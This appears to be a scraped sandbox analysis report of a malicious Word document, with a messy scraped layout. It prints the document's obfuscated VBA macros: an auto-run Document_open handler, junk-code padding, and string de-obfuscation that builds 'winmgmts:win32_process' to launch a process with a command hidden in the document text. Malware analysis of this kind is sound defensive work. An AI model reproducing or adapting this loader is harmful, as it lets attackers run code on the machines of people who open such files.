                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Create

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Xzrkngu1iuo6rwg

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Np29qma1fg5ke

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

Line | Instruction | Meta Information
9 | Private Sub Document_open() |
10 | Joieredaxt98oc6o |
11 | End Sub |

                                                                                                                              Module: Lxvinhyq0hu0i

Declaration
Line | Content
1 | Attribute VB_Name = "Lxvinhyq0hu0i"

                                                                                                                              Non-Executed Functions
APIs | Meta Information

                                                                                                                              Item

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              ChrW

                                                                                                                              wdKeyS

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              CreateObject

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Mid

                                                                                                                              Len

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Create

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Xzrkngu1iuo6rwg

                                                                                                                              Np29qma1fg5ke

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

Strings
Decrypted Strings
Line | Instruction | Meta Information
42 | Function Joieredaxt98oc6o() |
43 | On Error Resume Next |
44 | mn2b = Dk5att0cu_9jsb.StoryRanges.Item(1) | Item
45 | Goto nmHtBKNIA |
46 | Dim kaqktK as String |
47 | Open "fNHCB.hbEBBG.feKiwC" For Binary As 221 | Open
48 | Put # 221, , kaqktK |
49 | Close # 221 |
49 | nmHtBKNIA: |
51 | Goto MVKdEA |
52 | Dim RZyrFJ as String |
53 | Open "cklcdFF.ljzQFAII.yhDYGICo" For Binary As 166 | Open
54 | Put # 166, , RZyrFJ |
55 | Close # 166 |
55 | MVKdEA: |
57 | Goto lfRjBXXFA |
58 | Dim yJzxGZak as String |
59 | Open "KeuGF.APuwUHxl.GiUhBFB" For Binary As 105 | Open
60 | Put # 105, , yJzxGZak |
61 | Close # 105 |
61 | lfRjBXXFA: |
63 | mwb2 = "J)(3s2)(pJ)(3s2)(" |
64 | Uytq7q8qmjumesrn6n = "J)(3" + "s2)(roJ)(3s2" + ")(J)(3s2)(ceJ)(3s2" + ")(sJ)(3s2)(sJ)(3s" + "2)(J)(3s2)(" |
65 | Goto FzSmxUBI |
66 | Dim JubeVI as String |
67 | Open "NhKID.SYBhRIEGg.qCLeaM" For Binary As 150 | Open
68 | Put # 150, , JubeVI |
69 | Close # 150 |
69 | FzSmxUBI: |
71 | Goto cIiApH |
72 | Dim JKIoD as String |
73 | Open "dZEvHBM.HWisMo.kLMoA" For Binary As 143 | Open
74 | Put # 143, , JKIoD |
75 | Close # 143 |
75 | cIiApH: |
77 | Goto olbDbIA |
78 | Dim QyqGnByH as String |
79 | Open "NPkiDT.CkfBJvJ.bgnwZAB" For Binary As 115 | Open
80 | Put # 115, , QyqGnByH |

                                                                                                                              81

                                                                                                                              Close # 115

                                                                                                                              81

                                                                                                                              olbDbIA:

                                                                                                                              83

                                                                                                                              Po2ytmcrm_ypc = "J)(3s2)(" + ":wJ)(3s2)(J)(3s" + "2)(inJ)(3s2)(3J)(" + "3s2)(2J)(3s2)(_J)(3s2)("

    Goto jJMCQJDB
    Dim PrigNJEs as String
    Open "BpfOu.TVoTOHe.EzrPEDJ" For Binary As 188
    Put # 188, , PrigNJEs
    Close # 188
jJMCQJDB:
    Goto yDuIa
    Dim KAedr as String
    Open "pJlGBGe.jIXSWL.jkAfAEIf" For Binary As 255
    Put # 255, , KAedr
    Close # 255
yDuIa:
    Goto fGzqP
    Dim EiViHgGI as String
    Open "pPiJFZzI.dfizGxy.NRcSrA" For Binary As 101
    Put # 101, , EiViHgGI
    Close # 101
fGzqP:
    E4yx9bkuv6v1jxlzz = "wJ)(3s2)(i" + "nJ)(3s2)(mJ)(3s2)(gmJ)(3" + "s2)(tJ)(3s2)(J)(3s2)("
    Goto YEAwF
    Dim kySRBFED as String
    Open "OqezBEGR.dKnPpE.XZiNID" For Binary As 184
    Put # 184, , kySRBFED
    Close # 184
YEAwF:
    Goto jWIUH
    Dim wVgZExzI as String
    Open "WWmJGCEWG.XCrNGJ.ficHzH" For Binary As 234
    Put # 234, , wVgZExzI
    Close # 234
jWIUH:
    Goto XvETIO
    Dim FzOAw as String
    Open "iYrsMDeBF.SIoiFJ.zdnAB" For Binary As 173
    Put # 173, , FzOAw
    Close # 173
XvETIO:
    Aaq271x4j__7dcviuj = ChrW(wdKeyS)
    Goto qLfbCLdC
    Dim SEnkGD as String
    Open "zSasAJg.LDOIU.vvZOFJ" For Binary As 233
    Put # 233, , SEnkGD
    Close # 233
qLfbCLdC:
    Goto yqztDCl
    Dim AJXECAN as String
    Open "cBBImVFtj.VfOyHcZeG.KTQGJQv" For Binary As 256
    Put # 256, , AJXECAN
    Close # 256
yqztDCl:
    Goto yDAMCG
    Dim zoqaA as String
    Open "AtMXEHJGF.tPVXDfJI.vNeXEIF" For Binary As 212
    Put # 212, , zoqaA
    Close # 212
yDAMCG:
    Av35ujjoujldl9 = E4yx9bkuv6v1jxlzz + Aaq271x4j__7dcviuj + Po2ytmcrm_ypc + mwb2 + Uytq7q8qmjumesrn6n
    Goto hVRJE
    Dim IGamxCG as String
    Open "zpGvEhCHv.ZNcWIJcU.qeFzJB" For Binary As 161
    Put # 161, , IGamxCG
    Close # 161
hVRJE:
    Goto VIuzQOE
    Dim JxVVF as String
    Open "aguCEDpx.XlUcBUj.UPogGhX" For Binary As 208
    Put # 208, , JxVVF
    Close # 208
VIuzQOE:
    Goto jSGTCFaK
    Dim lOYxmwBA as String
    Open "ErIlZF.tHbIE.idUJKwuOi" For Binary As 110
    Put # 110, , lOYxmwBA
    Close # 110
jSGTCFaK:
    Xyc25um2qhx = Us5rvv097omc6(Av35ujjoujldl9)
    Goto lbHAbDF
    Dim iZGGBKjGH as String
    Open "uozeDEQ.xTczzpJbJ.GKYoFkDTH" For Binary As 135
    Put # 135, , iZGGBKjGH
    Close # 135
lbHAbDF:
    Goto nhVWCG
    Dim cHoJJlDBJ as String
    Open "oScEJFIH.GpYhI.ZPvpk" For Binary As 150
    Put # 150, , cHoJJlDBJ
    Close # 150
nhVWCG:
    Goto TFhBESFIX
    Dim OXtlEDLCd as String
    Open "gjoHAq.pgiDH.iYppCzD" For Binary As 165
    Put # 165, , OXtlEDLCd
    Close # 165
TFhBESFIX:
    Set Tbkimf15gklpyjuc5 = CreateObject(Xyc25um2qhx)
    Goto dcClB
    Dim uYPoFiE as String
    Open "TNqlmI.VQzWNlJC.IuleF" For Binary As 98
    Put # 98, , uYPoFiE
    Close # 98
dcClB:
    Goto sbVXlJE

                                                                                                                              Dim YaqiI as String

                                                                                                                              187

                                                                                                                              Open "QWkiJ.sNlBSC.hsUWFP" For Binary As 145

                                                                                                                              Open

                                                                                                                              188

                                                                                                                              Put # 145, , YaqiI

                                                                                                                              189

                                                                                                                              Close # 145

                                                                                                                              189

                                                                                                                              sbVXlJE:

                                                                                                                              191

                                                                                                                              Goto UbSMfKFUj

                                                                                                                              192

                                                                                                                              Dim BRfTAJ as String

                                                                                                                              193

                                                                                                                              Open "rqFdfCgk.WuMsFCHq.wYpcBKVBP" For Binary As 236

                                                                                                                              Open

                                                                                                                              194

                                                                                                                              Put # 236, , BRfTAJ

                                                                                                                              195

                                                                                                                              Close # 236

                                                                                                                              195

                                                                                                                              UbSMfKFUj:

                                                                                                                              197

                                                                                                                              U4fasjmuqzl8g4y9 = Mid(mn2b, (5), Len(mn2b))

                                                                                                                              Mid

                                                                                                                              Len

                                                                                                                              198

                                                                                                                              Goto FoTWuD

                                                                                                                              199

                                                                                                                              Dim hkpqEBd as String

                                                                                                                              200

                                                                                                                              Open "AcrzGL.zwvmHG.MqsxCr" For Binary As 213

                                                                                                                              Open

                                                                                                                              201

                                                                                                                              Put # 213, , hkpqEBd

                                                                                                                              202

                                                                                                                              Close # 213

                                                                                                                              202

                                                                                                                              FoTWuD:

                                                                                                                              204

                                                                                                                              Goto VipWJ

                                                                                                                              205

                                                                                                                              Dim GwJXIC as String

                                                                                                                              206

                                                                                                                              Open "XIjXFFFIJ.jYAPtLTyj.PLtLFT" For Binary As 165

                                                                                                                              Open

                                                                                                                              207

                                                                                                                              Put # 165, , GwJXIC

                                                                                                                              208

                                                                                                                              Close # 165

                                                                                                                              208

                                                                                                                              VipWJ:

                                                                                                                              210

                                                                                                                              Goto yHCsJFACD

                                                                                                                              211

                                                                                                                              Dim eTuZIDG as String

                                                                                                                              212

                                                                                                                              Open "MiwKq.hkWsDcI.YmoTAGR" For Binary As 135

                                                                                                                              Open

                                                                                                                              213

                                                                                                                              Put # 135, , eTuZIDG

                                                                                                                              214

                                                                                                                              Close # 135

                                                                                                                              214

                                                                                                                              yHCsJFACD:

                                                                                                                              216

                                                                                                                              Goto FEJNFPMF

                                                                                                                              217

                                                                                                                              Dim UFEneAQF as String

                                                                                                                              218

                                                                                                                              Open "NgFRIFlFQ.imXZAJE.tzzlC" For Binary As 153

                                                                                                                              Open

                                                                                                                              219

                                                                                                                              Put # 153, , UFEneAQF

                                                                                                                              220

                                                                                                                              Close # 153

                                                                                                                              220

                                                                                                                              FEJNFPMF:

                                                                                                                              222

                                                                                                                              Goto rDIcxFB

                                                                                                                              223

                                                                                                                              Dim EhrmhuB as String

                                                                                                                              224

                                                                                                                              Open "RSIiW.JGdvBjSmB.WubTFJ" For Binary As 118

                                                                                                                              Open

                                                                                                                              225

                                                                                                                              Put # 118, , EhrmhuB

                                                                                                                              226

                                                                                                                              Close # 118

                                                                                                                              226

                                                                                                                              rDIcxFB:

                                                                                                                              228

                                                                                                                              Goto xuAPcBl

                                                                                                                              229

                                                                                                                              Dim mxDIrHC as String

                                                                                                                              230

                                                                                                                              Open "NipqJ.tIztQI.WMXjaJ" For Binary As 202

                                                                                                                              Open

                                                                                                                              231

                                                                                                                              Put # 202, , mxDIrHC

                                                                                                                              232

                                                                                                                              Close # 202

                                                                                                                              232

                                                                                                                              xuAPcBl:

                                                                                                                              234

                                                                                                                              Tbkimf15gklpyjuc5.Create Us5rvv097omc6(U4fasjmuqzl8g4y9), Xzrkngu1iuo6rwg, Np29qma1fg5ke

                                                                                                                              Create

                                                                                                                              Xzrkngu1iuo6rwg

                                                                                                                              Np29qma1fg5ke

                                                                                                                              235

                                                                                                                              Goto pxMXSJrIc

                                                                                                                              236

                                                                                                                              Dim JzcNByvAX as String

                                                                                                                              237

                                                                                                                              Open "dCIAJyHr.uGSFGCFE.hgENI" For Binary As 133

                                                                                                                              Open

                                                                                                                              238

                                                                                                                              Put # 133, , JzcNByvAX

                                                                                                                              239

                                                                                                                              Close # 133

                                                                                                                              239

                                                                                                                              pxMXSJrIc:

                                                                                                                              241

                                                                                                                              Goto NwlcQEELI

                                                                                                                              242

                                                                                                                              Dim BrrXfI as String

                                                                                                                              243

                                                                                                                              Open "gEMlED.skZhEggk.ZyWBD" For Binary As 239

                                                                                                                              Open

                                                                                                                              244

                                                                                                                              Put # 239, , BrrXfI

                                                                                                                              245

                                                                                                                              Close # 239

                                                                                                                              245

                                                                                                                              NwlcQEELI:

                                                                                                                              247

                                                                                                                              Goto ZxZNGGUBd

                                                                                                                              248

                                                                                                                              Dim CtmaxWDYG as String

                                                                                                                              249

                                                                                                                              Open "bfJqAKr.cLEdAF.oYWiAFEQ" For Binary As 143

                                                                                                                              Open

                                                                                                                              250

                                                                                                                              Put # 143, , CtmaxWDYG

                                                                                                                              251

                                                                                                                              Close # 143

                                                                                                                              251

                                                                                                                              ZxZNGGUBd:

                                                                                                                              253

                                                                                                                              Goto IIJMEYBZ

                                                                                                                              254

                                                                                                                              Dim ohdoz as String

                                                                                                                              255

                                                                                                                              Open "eHqqE.nCeMDET.kZWuQGE" For Binary As 147

                                                                                                                              Open

                                                                                                                              256

                                                                                                                              Put # 147, , ohdoz

                                                                                                                              257

                                                                                                                              Close # 147

                                                                                                                              257

                                                                                                                              IIJMEYBZ:

                                                                                                                              259

                                                                                                                              Goto aDFRF

                                                                                                                              260

                                                                                                                              Dim TLfxGCa as String

                                                                                                                              261

                                                                                                                              Open "hSzhx.onZqBBzG.aRYCE" For Binary As 269

                                                                                                                              Open

                                                                                                                              262

                                                                                                                              Put # 269, , TLfxGCa

                                                                                                                              263

                                                                                                                              Close # 269

                                                                                                                              263

                                                                                                                              aDFRF:

                                                                                                                              265

                                                                                                                              Goto zHYrT

                                                                                                                              266

                                                                                                                              Dim QqQRUOBIy as String

                                                                                                                              267

                                                                                                                              Open "BiUfo.vtUVwAWGC.hUSLqGGIO" For Binary As 194

                                                                                                                              Open

                                                                                                                              268

                                                                                                                              Put # 194, , QqQRUOBIy

                                                                                                                              269

                                                                                                                              Close # 194

                                                                                                                              269

                                                                                                                              zHYrT:

                                                                                                                              271

                                                                                                                              End Function

                                                                                                                              APIs
                                                                                                                              Meta Information

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Replace

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: H9dyim0o_e1y2ad

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Strings
                                                                                                                              Decrypted Strings
| Line | Instruction | Meta Information |
| --- | --- | --- |
| 272 | Function Us5rvv097omc6(Wj34bkji64gbgi_p) | |
| 273 | On Error Resume Next | |
| 274 | Goto RMyrFd | |
| 275 | Dim uJtiAP as String | |
| 276 | Open "CXrJJB.OBfnW.uqEngDYV" For Binary As 206 | Open |
| 277 | Put # 206, , uJtiAP | |
| 278 | Close # 206 | |
| 278 | RMyrFd: | |
| 280 | Goto ZqNrvaa | |
| 281 | Dim dThRBEAv as String | |
| 282 | Open "HGXMmlZoZ.jEXaTVE.zeocvMGG" For Binary As 207 | Open |
| 283 | Put # 207, , dThRBEAv | |
| 284 | Close # 207 | |
| 284 | ZqNrvaa: | |
| 286 | Goto kMzKEr | |
| 287 | Dim ahjNCC as String | |
| 288 | Open "ZFWwdLJFE.FcQNSnyB.yuKyrJAD" For Binary As 93 | Open |
| 289 | Put # 93, , ahjNCC | |
| 290 | Close # 93 | |
| 290 | kMzKEr: | |
| 292 | Dbzgu9yuthixkrcjt = (Wj34bkji64gbgi_p) | |
| 293 | Goto JXblRBK | |
| 294 | Dim sCwjljF as String | |
| 295 | Open "obWgmFILu.KLSrfFHDI.nylpN" For Binary As 185 | Open |
| 296 | Put # 185, , sCwjljF | |
| 297 | Close # 185 | |
| 297 | JXblRBK: | |
| 299 | Goto uJknJZHFB | |
| 300 | Dim WpdDxhHa as String | |
| 301 | Open "DcfnrACC.XeVEC.QdSVCUJ" For Binary As 245 | Open |
| 302 | Put # 245, , WpdDxhHa | |
| 303 | Close # 245 | |
| 303 | uJknJZHFB: | |
| 305 | Goto nCWvB | |
| 306 | Dim NJlsEIS as String | |
| 307 | Open "nYskWX.aOSpmAFIB.kCBksCD" For Binary As 209 | Open |
| 308 | Put # 209, , NJlsEIS | |
| 309 | Close # 209 | |
| 309 | nCWvB: | |
| 311 | Znr2e9ewo0wtxy = Gdxyahu7r2bnouqu(Dbzgu9yuthixkrcjt) | |
| 312 | Goto gvnNjywC | |
| 313 | Dim RWlYF as String | |
| 314 | Open "cfmqZH.yHFfXEyD.iUezXEC" For Binary As 124 | Open |
| 315 | Put # 124, , RWlYF | |
| 316 | Close # 124 | |
| 316 | gvnNjywC: | |
| 318 | Goto IpXGAFACy | |
| 319 | Dim WnWcBBeF as String | |
| 320 | Open "dcEwJD.cZCpC.kfXrIC" For Binary As 137 | Open |
| 321 | Put # 137, , WnWcBBeF | |
| 322 | Close # 137 | |
| 322 | IpXGAFACy: | |
| 324 | Goto ObUqEpuD | |
| 325 | Dim uWAjsYwtG as String | |
| 326 | Open "qKjdvEDq.lYfhW.eTVwADADD" For Binary As 100 | Open |
| 327 | Put # 100, , uWAjsYwtG | |
| 328 | Close # 100 | |
| 328 | ObUqEpuD: | |
| 330 | Us5rvv097omc6 = Znr2e9ewo0wtxy | |
| 331 | Goto ZuuLFE | |
| 332 | Dim IJSGH as String | |
| 333 | Open "DbRqLDGCg.nxwYCaF.sZZrJ" For Binary As 168 | Open |
| 334 | Put # 168, , IJSGH | |
| 335 | Close # 168 | |
| 335 | ZuuLFE: | |
| 337 | Goto LjVfJ | |
| 338 | Dim DxojDGC as String | |
| 339 | Open "nRpjIJ.tkIcCAbCF.hJzbH" For Binary As 65 | Open |
| 340 | Put # 65, , DxojDGC | |
| 341 | Close # 65 | |
| 341 | LjVfJ: | |
| 343 | Goto KiOKSNEG | |
| 344 | Dim JHGODJK as String | |
| 345 | Open "gtvUAW.KeNGGlEDI.FCFXBEHbH" For Binary As 177 | Open |
| 346 | Put # 177, , JHGODJK | |
| 347 | Close # 177 | |
| 347 | KiOKSNEG: | |
| 349 | End Function | |

APIs | Meta Information

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Replace

                                                                                                                              H9dyim0o_e1y2ad

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

Strings | Decrypted Strings
| Line | Instruction | Meta Information |
| --- | --- | --- |
| 2 | Function Gdxyahu7r2bnouqu(G_vsoyetocf_q1hwst) | |
| 3 | Goto kmOCpG | |
| 4 | Dim lfjdHL as String | |
| 5 | Open "ZbLbn.FiqyBGPC.ROWoCHF" For Binary As 230 | Open |
| 6 | Put # 230, , lfjdHL | |
| 7 | Close # 230 | |
| 7 | kmOCpG: | |
| 9 | Goto RhecDCNb | |
| 10 | Dim GLxLQDxBB as String | |
| 11 | Open "WWgXBJbAL.psfjJF.iosTZOn" For Binary As 176 | Open |
| 12 | Put # 176, , GLxLQDxBB | |
| 13 | Close # 176 | |
| 13 | RhecDCNb: | |
| 15 | Goto iAKfBEDC | |
| 16 | Dim eYojg as String | |
| 17 | Open "eKLzaJBKG.eCACJBH.NfdiGiC" For Binary As 76 | Open |
| 18 | Put # 76, , eYojg | |
| 19 | Close # 76 | |
| 19 | iAKfBEDC: | |
| 21 | Gdxyahu7r2bnouqu = VBA.Replace(G_vsoyetocf_q1hwst, "J" + ")(3" + "s2)" + "(", H9dyim0o_e1y2ad) | Replace |

                                                                                                                              H9dyim0o_e1y2ad

                                                                                                                              23

                                                                                                                              Goto PksXIAC

                                                                                                                              24

                                                                                                                              Dim bVAPDAD as String

                                                                                                                              25

                                                                                                                              Open "YNveE.qehAq.fHHuGb" For Binary As 214

                                                                                                                              Open

                                                                                                                              26

                                                                                                                              Put # 214, , bVAPDAD

                                                                                                                              27

                                                                                                                              Close # 214

                                                                                                                              27

                                                                                                                              PksXIAC:

                                                                                                                              29

                                                                                                                              Goto hckCCJvD

                                                                                                                              30

                                                                                                                              Dim oVlMEI as String

                                                                                                                              31

                                                                                                                              Open "UqHHHBQRG.wPBFeBYHC.BFGBerA" For Binary As 203

                                                                                                                              Open

                                                                                                                              32

                                                                                                                              Put # 203, , oVlMEI

                                                                                                                              33

                                                                                                                              Close # 203

                                                                                                                              33

                                                                                                                              hckCCJvD:

                                                                                                                              35

                                                                                                                              Goto IaIuovC

                                                                                                                              36

                                                                                                                              Dim HMJCGGAMi as String

                                                                                                                              37

                                                                                                                              Open "ObyEHIBL.hGKABcIQ.yeYrFAOmg" For Binary As 100

                                                                                                                              Open

                                                                                                                              38

                                                                                                                              Put # 100, , HMJCGGAMi

                                                                                                                              39

                                                                                                                              Close # 100

                                                                                                                              39

                                                                                                                              IaIuovC:

                                                                                                                              41

                                                                                                                              End Function

Module: UserForm1

Declaration
Line  Content
1  Attribute VB_Name = "UserForm1"
2  Attribute VB_Base = "0{E4811F3D-9F01-4BC4-95D4-D40026D931D3}{41345D1C-9C4E-4385-B780-C54CCB7ABE17}"
3  Attribute VB_GlobalNameSpace = False
4  Attribute VB_Creatable = False
5  Attribute VB_PredeclaredId = True
6  Attribute VB_Exposed = False
7  Attribute VB_TemplateDerived = False
8  Attribute VB_Customizable = False

Module: UserForm2

Declaration
Line  Content
1  Attribute VB_Name = "UserForm2"
2  Attribute VB_Base = "0{AF4533AC-BBF6-4979-BA91-9D2D4959595A}{3CF58CA5-D4D4-49F7-BA7F-F124E45D0A17}"
3  Attribute VB_GlobalNameSpace = False
4  Attribute VB_Creatable = False
5  Attribute VB_PredeclaredId = True
6  Attribute VB_Exposed = False
7  Attribute VB_TemplateDerived = False
8  Attribute VB_Customizable = False

Module: UserForm3

Declaration
Line  Content
1  Attribute VB_Name = "UserForm3"
2  Attribute VB_Base = "0{A4835EEF-81F1-4677-BAA3-01DF6CF2C26F}{ADE6D7C4-3411-4730-A534-6D8AAFEFBA8F}"
3  Attribute VB_GlobalNameSpace = False
4  Attribute VB_Creatable = False
5  Attribute VB_PredeclaredId = True
6  Attribute VB_Exposed = False
7  Attribute VB_TemplateDerived = False
8  Attribute VB_Customizable = False

Module: UserForm4

Declaration
Line  Content
1  Attribute VB_Name = "UserForm4"
2  Attribute VB_Base = "0{4FA002EA-017C-4E93-9C6B-22A1ABC6E370}{C27736E2-CDA0-4100-9FCF-E22B5D354CA0}"
3  Attribute VB_GlobalNameSpace = False
4  Attribute VB_Creatable = False
5  Attribute VB_PredeclaredId = True
6  Attribute VB_Exposed = False
7  Attribute VB_TemplateDerived = False
8  Attribute VB_Customizable = False

Module: UserForm5

Declaration
Line  Content
1  Attribute VB_Name = "UserForm5"
2  Attribute VB_Base = "0{B4698655-398F-452C-B828-35D501CBBA3E}{6D1A2E80-5267-422A-B1BA-58F578BA8D71}"
3  Attribute VB_GlobalNameSpace = False
4  Attribute VB_Creatable = False
5  Attribute VB_PredeclaredId = True
6  Attribute VB_Exposed = False
7  Attribute VB_TemplateDerived = False
8  Attribute VB_Customizable = False

Module: Vhr7vb1s1hgs

Declaration
Line  Content
1  Attribute VB_Name = "Vhr7vb1s1hgs"

                                                                                                                                Executed Functions

                                                                                                                                • Instruction ID: 26b916b73ab0e951fd4ce632e31531ae2cfefd66382bf70c977ab5a14c49e0ff
                                                                                                                                • Opcode Fuzzy Hash: 087496c268b642eff904f0c536b7a80e54def75848adf8f4ad6506267183421f
                                                                                                                                • Instruction Fuzzy Hash: 81513731D1CA894FE304DB18D895AA6B7E1FF86310F14C6BAE44CC7196EF29A945C781
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702280665.00007FFA34B00000.00000040.00000001.sdmp, Offset: 00007FFA34B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34b00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 960ff428657f3985243c2439a705709b24e0aaf246090e2155a1243720b48fc0
                                                                                                                                • Instruction ID: 2854e0ec4a04865059caf6700ac75d041da2334e73713389ce3a780d1aea6473
                                                                                                                                • Opcode Fuzzy Hash: 960ff428657f3985243c2439a705709b24e0aaf246090e2155a1243720b48fc0
                                                                                                                                • Instruction Fuzzy Hash: 48517B8290E7C54FE3A7977848A52A5BFA09F53215B0981FBD8CDCB1E3DD09580AD363
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702280665.00007FFA34B00000.00000040.00000001.sdmp, Offset: 00007FFA34B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34b00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 067e670e10abee3118a2e0f887f09e4d07dcec21beba8d7d0c10b8d85f42c2ba
                                                                                                                                • Instruction ID: 8e9f702a584e5f07e621a8bd4dd24c1b91921313776463dac32314119484971a
                                                                                                                                • Opcode Fuzzy Hash: 067e670e10abee3118a2e0f887f09e4d07dcec21beba8d7d0c10b8d85f42c2ba
                                                                                                                                • Instruction Fuzzy Hash: 2151E721A1DB9B4FEBE5DB188891178BEE1EF66211B48C4B9D80DC71E3DF19EC149342
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702280665.00007FFA34B00000.00000040.00000001.sdmp, Offset: 00007FFA34B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34b00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1173e57be668daa57847895e8c42be7dcc322884d8ad113ba4d59c98fdd60be8
                                                                                                                                • Instruction ID: f8b59e1d38b562caf5c29abafd948780369af98423518fecff63e3bfec90bec1
                                                                                                                                • Opcode Fuzzy Hash: 1173e57be668daa57847895e8c42be7dcc322884d8ad113ba4d59c98fdd60be8
                                                                                                                                • Instruction Fuzzy Hash: A241F762E0CB454FE39CDB5C9895278BBC1EF96311B05C1BED98DC7193DE166C0A5382
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
